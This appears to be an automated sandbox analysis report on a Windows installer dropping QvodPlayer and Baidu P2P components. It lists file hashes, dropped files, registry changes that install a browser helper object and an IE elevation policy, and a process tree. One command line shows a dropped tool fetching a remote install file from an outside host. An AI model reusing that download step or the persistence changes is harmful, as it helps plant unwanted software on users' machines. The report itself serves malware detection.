Overview
overview
7Static
static
531dcf3ead0...7a.exe
windows7-x64
731dcf3ead0...7a.exe
windows10-2004-x64
7$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3kuaibo.exe
windows7-x64
5kuaibo.exe
windows10-2004-x64
5qvodkunbang.exe
windows7-x64
7qvodkunbang.exe
windows10-2004-x64
7$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3BaiduP2PService.exe
windows7-x64
3BaiduP2PService.exe
windows10-2004-x64
3P2PBase.dll
windows7-x64
3P2PBase.dll
windows10-2004-x64
3P2PStatReport.dll
windows7-x64
3P2PStatReport.dll
windows10-2004-x64
3P2SBase.dll
windows7-x64
3P2SBase.dll
windows10-2004-x64
3sr.exe
windows7-x64
1sr.exe
windows10-2004-x64
3qvodupdate.exe
windows7-x64
7qvodupdate.exe
windows10-2004-x64
7$APPDATA/t...er.dll
windows7-x64
6$APPDATA/t...er.dll
windows10-2004-x64
6$FAVORITES...��.url
windows7-x64
1$FAVORITES...��.url
windows10-2004-x64
1$FAVORITES...��.url
windows7-x64
1$FAVORITES...��.url
windows10-2004-x64
1Analysis
-
max time kernel
52s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 10:31
Behavioral task
behavioral1
Sample
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsTools.dll
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsTools.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
kuaibo.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
kuaibo.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
qvodkunbang.exe
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
qvodkunbang.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
$PLUGINSDIR/nsTools.dll
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
$PLUGINSDIR/nsTools.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
BaiduP2PService.exe
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
BaiduP2PService.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
P2PBase.dll
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
P2PBase.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
P2PStatReport.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
P2PStatReport.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
P2SBase.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
P2SBase.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
sr.exe
Resource
win7-20240729-en
Behavioral task
behavioral24
Sample
sr.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
qvodupdate.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
qvodupdate.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
$APPDATA/tools/bdmanager.dll
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
$APPDATA/tools/bdmanager.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
$FAVORITES/Links/全国最给力充值店-淘宝网.url
Resource
win7-20241023-en
Behavioral task
behavioral30
Sample
$FAVORITES/Links/全国最给力充值店-淘宝网.url
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
$FAVORITES/全国最给力充值店-淘宝网.url
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
$FAVORITES/全国最给力充值店-淘宝网.url
Resource
win10v2004-20241007-en
General
-
Target
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe
-
Size
1.7MB
-
MD5
ddb979d1f38e3253d58b1d11f993de2e
-
SHA1
739cf29766c577b9056043c8d38320495ff4447f
-
SHA256
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a
-
SHA512
3b0a19836235e5d10ccf6da6040a9e7a45a66109763146e11ab5f547b4ad221906f6af01d62f575ad46bc1a33baf2f118caafa49fc68084269f54152a5a7ffe1
-
SSDEEP
49152:s07aDJnVNJi+n1+NGi9AOmVDOki6UbdjU:BeDJnF1oGyuDfi6Ub5U
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
Processes:
kuaibo.exeqvodupdate.exeqvodkunbang.exeBaiduP2PService.exesr.exeBaiduP2PService.exepid process 2412 kuaibo.exe 2828 qvodupdate.exe 2272 qvodkunbang.exe 920 BaiduP2PService.exe 1420 sr.exe 808 BaiduP2PService.exe -
Loads dropped DLL 22 IoCs
Processes:
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exeqvodupdate.exeqvodkunbang.exeBaiduP2PService.exeBaiduP2PService.exepid process 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2828 qvodupdate.exe 2828 qvodupdate.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe 2272 qvodkunbang.exe 2272 qvodkunbang.exe 2272 qvodkunbang.exe 920 BaiduP2PService.exe 920 BaiduP2PService.exe 920 BaiduP2PService.exe 2272 qvodkunbang.exe 808 BaiduP2PService.exe 808 BaiduP2PService.exe 808 BaiduP2PService.exe -
Installs/modifies Browser Helper Object 2 TTPs 8 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
Processes:
qvodupdate.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\NoExplorer = "1" qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects qvodupdate.exe -
Processes:
resource yara_rule behavioral1/memory/2368-0-0x0000000000400000-0x0000000000534000-memory.dmp upx \Program Files (x86)\QvodPlayer\kuaibo.exe upx behavioral1/memory/2412-26-0x0000000000400000-0x00000000004B6000-memory.dmp upx behavioral1/memory/2368-28-0x0000000000400000-0x0000000000534000-memory.dmp upx behavioral1/memory/2368-29-0x0000000002890000-0x0000000002946000-memory.dmp upx behavioral1/memory/2412-30-0x0000000000400000-0x00000000004B6000-memory.dmp upx behavioral1/memory/2368-61-0x0000000000400000-0x0000000000534000-memory.dmp upx behavioral1/memory/2368-185-0x0000000000400000-0x0000000000534000-memory.dmp upx behavioral1/memory/2412-249-0x0000000000400000-0x00000000004B6000-memory.dmp upx -
Drops file in Program Files directory 17 IoCs
Processes:
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exeqvodkunbang.exeqvodupdate.exedescription ioc process File created C:\Program Files (x86)\QvodPlayer\tools.exe 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe File created C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe File created C:\Program Files (x86)\tools\P2PBase.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\P2PStatReport.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\sr.exe qvodkunbang.exe File opened for modification C:\Program Files (x86)\QvodPlayer\isWrite\ 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe File opened for modification C:\Program Files (x86)\QvodPlayer\ 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodkunbang.exe File created C:\Program Files (x86)\tools\BaiduP2PService.exe qvodkunbang.exe File created C:\Program Files (x86)\tools\P2SBase.dll qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\qvodupdate.exe 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodkunbang.exe File opened for modification C:\Program Files (x86)\tools\ qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\kuaibo.exe 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\ qvodupdate.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
BaiduP2PService.exe31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exekuaibo.exeqvodupdate.exeqvodkunbang.exeBaiduP2PService.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BaiduP2PService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kuaibo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qvodupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qvodkunbang.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BaiduP2PService.exe -
Processes:
BaiduP2PService.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppName = "BaiduP2PService.exe" BaiduP2PService.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\Policy = "3" BaiduP2PService.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0} BaiduP2PService.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppPath = "C:\\Program Files (x86)\\tools" BaiduP2PService.exe -
Modifies registry class 5 IoCs
Processes:
qvodupdate.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\ = "AccountProtect Class" qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32 qvodupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32\ = "C:\\ProgramData\\tools\\bdmanager.dll" qvodupdate.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
qvodupdate.exeqvodkunbang.exepid process 2828 qvodupdate.exe 2828 qvodupdate.exe 2272 qvodkunbang.exe 2272 qvodkunbang.exe 2272 qvodkunbang.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
qvodupdate.exeqvodkunbang.exedescription pid process Token: SeDebugPrivilege 2828 qvodupdate.exe Token: SeDebugPrivilege 2828 qvodupdate.exe Token: SeDebugPrivilege 2272 qvodkunbang.exe Token: SeDebugPrivilege 2272 qvodkunbang.exe Token: SeDebugPrivilege 2272 qvodkunbang.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
kuaibo.exepid process 2412 kuaibo.exe 2412 kuaibo.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
kuaibo.exepid process 2412 kuaibo.exe 2412 kuaibo.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exeqvodkunbang.exedescription pid process target process PID 2368 wrote to memory of 2412 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe kuaibo.exe PID 2368 wrote to memory of 2412 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe kuaibo.exe PID 2368 wrote to memory of 2412 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe kuaibo.exe PID 2368 wrote to memory of 2412 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe kuaibo.exe PID 2368 wrote to memory of 2828 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodupdate.exe PID 2368 wrote to memory of 2828 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodupdate.exe PID 2368 wrote to memory of 2828 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodupdate.exe PID 2368 wrote to memory of 2828 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodupdate.exe PID 2368 wrote to memory of 2828 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodupdate.exe PID 2368 wrote to memory of 2828 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodupdate.exe PID 2368 wrote to memory of 2828 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodupdate.exe PID 2368 wrote to memory of 2272 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodkunbang.exe PID 2368 wrote to memory of 2272 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodkunbang.exe PID 2368 wrote to memory of 2272 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodkunbang.exe PID 2368 wrote to memory of 2272 2368 31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe qvodkunbang.exe PID 2272 wrote to memory of 920 2272 qvodkunbang.exe BaiduP2PService.exe PID 2272 wrote to memory of 920 2272 qvodkunbang.exe BaiduP2PService.exe PID 2272 wrote to memory of 920 2272 qvodkunbang.exe BaiduP2PService.exe PID 2272 wrote to memory of 920 2272 qvodkunbang.exe BaiduP2PService.exe PID 2272 wrote to memory of 1420 2272 qvodkunbang.exe sr.exe PID 2272 wrote to memory of 1420 2272 qvodkunbang.exe sr.exe PID 2272 wrote to memory of 1420 2272 qvodkunbang.exe sr.exe PID 2272 wrote to memory of 1420 2272 qvodkunbang.exe sr.exe PID 2272 wrote to memory of 808 2272 qvodkunbang.exe BaiduP2PService.exe PID 2272 wrote to memory of 808 2272 qvodkunbang.exe BaiduP2PService.exe PID 2272 wrote to memory of 808 2272 qvodkunbang.exe BaiduP2PService.exe PID 2272 wrote to memory of 808 2272 qvodkunbang.exe BaiduP2PService.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe"C:\Users\Admin\AppData\Local\Temp\31dcf3ead048f0a0ae0e23fe431018236fe79b5e596d1ff52b9cc5c63d5ea87a.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Program Files (x86)\QvodPlayer\kuaibo.exe"C:\Program Files (x86)\QvodPlayer\kuaibo.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2412
-
-
C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe" init3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:920
-
-
C:\Program Files (x86)\tools\sr.exe"C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\3⤵
- Executes dropped EXE
PID:1420
-
-
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:808
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
1KB
MD5b9254a4eb07a779a9f2b8a63520c5239
SHA160ef991713cac6f43b2d6f44e38ee022ee704665
SHA25633a1922f4317dc9cae1ee0002277844e90400b23433db2a756d965befa921b6b
SHA5125c444d61847f972f1ea30049e3d99c4bca3be2329804a548019a0e6ca05ec680a0eb8b678b1657319b557663a7e942849a4b694112a6ab999ae3cf44220ef9eb
-
Filesize
1KB
MD51d823e935dfb382c5dfa94ceb31e34f5
SHA17fa62fd509670f62fdd66fdb8dd16d08d7c37177
SHA2566fa35540140a6acc0c77b41548800b64f557453d07347e0fb4b8be804716c4bf
SHA5124608061db597589e4892889aefeafa2a24ad13cdf8e18a123f28fa5de4a653b0f4d2c9b9f63e8bedb760116d1d0a501b3b6ba4d6e0fed3cb3d446e9bab384b27
-
Filesize
16KB
MD5488d6c9bf535a0634573b5154f680f69
SHA1cbb5675cbef28e6f129e562131bd6a8a4b992fa7
SHA25677d7009486dd643fec8ef886658e8d273457d2568baf025ca9424a641aa3ac94
SHA51212e07657b7aed1c5440cc102b5d2978b08d6796910d84b935b5644de0a42e73b764fd25d4ae6fd985d89180734e1e74722181a6fc64a500dab7963afa88a010e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
17KB
MD5d9f97bbefebd7f6680a5cd7e428e7c6e
SHA1b8f27fd1cecd21a0d893cd6c4d2900fcf5e657a9
SHA256bb445582d1ea6728c3ef6836d0523b3d36b36f3ebc1206cdfcde1ef92493f506
SHA5125808b085bdb028dae82434b255a0b1da3391409942899ecd4a7a01734e617f5e11a28d56e01d82aace80e5e37f395f43113cc8e96b532726388818f3c41d7f5d
-
Filesize
189B
MD5f720734f006968afb92e2d00051d83eb
SHA11311bff55d30433079b13b8c11b3f65dfc9408e8
SHA2564b3a2085f3d27254a477999464d1baa498c656ea39ec4453edf32319462447be
SHA512a723fe26ec830a2453c19bb140b640e5ce8499ea061cf55e5554b8750520ec6f7df77848640c30d52fef2b3c9d5eea8ecde8f4af9826b6800da4d3a7a0c69727
-
Filesize
262KB
MD569fcb9ae215b1397ae1f9751da7016d0
SHA1da3816591f15fcdae48910fb632ee5d2f8c09d4d
SHA256ba5b2e57997aae2ce636a76e8ffc536498bf3882d61648f30c169cc17fd1f342
SHA512f9c6aa7b420b1e18ab7e7351f4d228e5b2fd047fc70e170b037efda0bca4b5ff146f6457f477aeaecf829e42d3c730530483c240e0b1de98aef217c2bcc56689
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (2).lnk
Filesize1KB
MD5a466741099df4ab8257ebc2750123629
SHA15a40918aeb4cdc22cb65279181c2a9d1b536e4d6
SHA25622144030f48daa284bb6a29695d321cbc36675a0b49e9365b4fcea60d54ab462
SHA5122f32f484756f80324256bfe4a98ee45157e61ba1a7f70a6961352778c0847f8c392a040f89afe85e53968db6d1ed5bf3c302a56de13cd1e68b7c4f284377714e
-
Filesize
938B
MD517f1a4eee3988a354df4500f8260391e
SHA1e8a76ffeb8bce1521a320f63cd75922f6de929aa
SHA256dda7066637792d06e967b5e1ad8253e9acd2ca060e198468802885988c60675d
SHA512ad151db2f9b73a578b1add01f49e9a8b5254b34fc5c80737957e5b015591d2239942ca4a613ccd0e6398782ae08365d7858332702e0f2cfd505444122fff53d3
-
Filesize
408KB
MD5d8b7c3af2f63db6cc542273e192b1d02
SHA134b9d8be2c314ae099b3f825b801a78b608dec26
SHA2566d56acd63ab77f03feb92e8499b42df24388677e7e2bbbfeb2ff706d4a7550b9
SHA5124b27ac2b324ad5d0aecc8eb64a1f055f9b16837570efe43198dce1d2f5809fcbd104ac39563ea32066990fb0fb34ab85ddf072c4f5ef283c052b742c6a4e675b
-
Filesize
737KB
MD51009304614108cc969ca448183c54c03
SHA17df4d9658542c11e40dc390e4dba49554b1084d0
SHA256c5e0e2aad81ed8920984572ea30110c1d341d5a0628213607d396d741526b26f
SHA51205c24315a05f8dae782f33b0b70235dba50f7ee607a3e3f23e2174745db892971843cb62916124983db43ef80268e6558098126f636768ef1edda8dc892c1e5f
-
Filesize
304KB
MD573af65d9136e0a6294d33a1cd720fa1f
SHA112c88a51134e18ad5799638055b82afa26fbbd79
SHA256c0741f8592d2d07421423a70036b2978fc2d00158cd2837f2f5de267c2c942f7
SHA5123a636aa3dd08fa2250f2cd1aed5bdda0c17e7b1b6c96df045c1fdfc21a9164e545bfe5a2742e46ff4070e9347aa0722d6bad3fff606e08a3901eceabc5514e2a
-
Filesize
88KB
MD5a1b9f2a3c74ef973879dba488ce9ce1a
SHA14dff7bf406bf681e2d7f81ecec349628f722053c
SHA256c0a1b86c1f39897b5308ba876f5631bc55751bde494161f7a0c87c1454bdaea8
SHA512dc7a5c8e7703e6b40fab370c4a99be0b7a65e870d23e6f3cde007fbffaa4de5294108fad534af0dd281f647a27337b00ba823b7ae0b3944b50798a82b3679e6a
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
154KB
MD583bcf3ad82ce65d2bd0fdd364fe32cb5
SHA132c5080bbf51dd22bed7f594a92f753a25eef73c
SHA2565635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d
SHA512852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81
-
Filesize
11KB
MD5959ea64598b9a3e494c00e8fa793be7e
SHA140f284a3b92c2f04b1038def79579d4b3d066ee0
SHA25603cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b
SHA5125e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64
-
Filesize
11KB
MD5bf712f32249029466fa86756f5546950
SHA175ac4dc4808ac148ddd78f6b89a51afbd4091c2e
SHA2567851cb12fa4131f1fee5de390d650ef65cac561279f1cfe70ad16cc9780210af
SHA51213f69959b28416e0b8811c962a49309dca3f048a165457051a28a3eb51377dcaf99a15e86d7eee8f867a9e25ecf8c44da370ac8f530eeae7b5252eaba64b96f4
-
Filesize
260KB
MD56ae9eaa868bcb42ae79bf9701b18e7ec
SHA180bd26a403aaee21fc2b9af0d5585a768ea3acd0
SHA256d4fb435c03841d4911cba57bd01212156d4a0ab4554e5a25b3604e43b3622fb5
SHA51206c60bb27b39064c237e52d3ccea2371953fc454321eab2046ffcb5cc9771206accb0124fdf1726d5cf821906ee05e03dc7ae9ca2534f6543e585382a9c0a688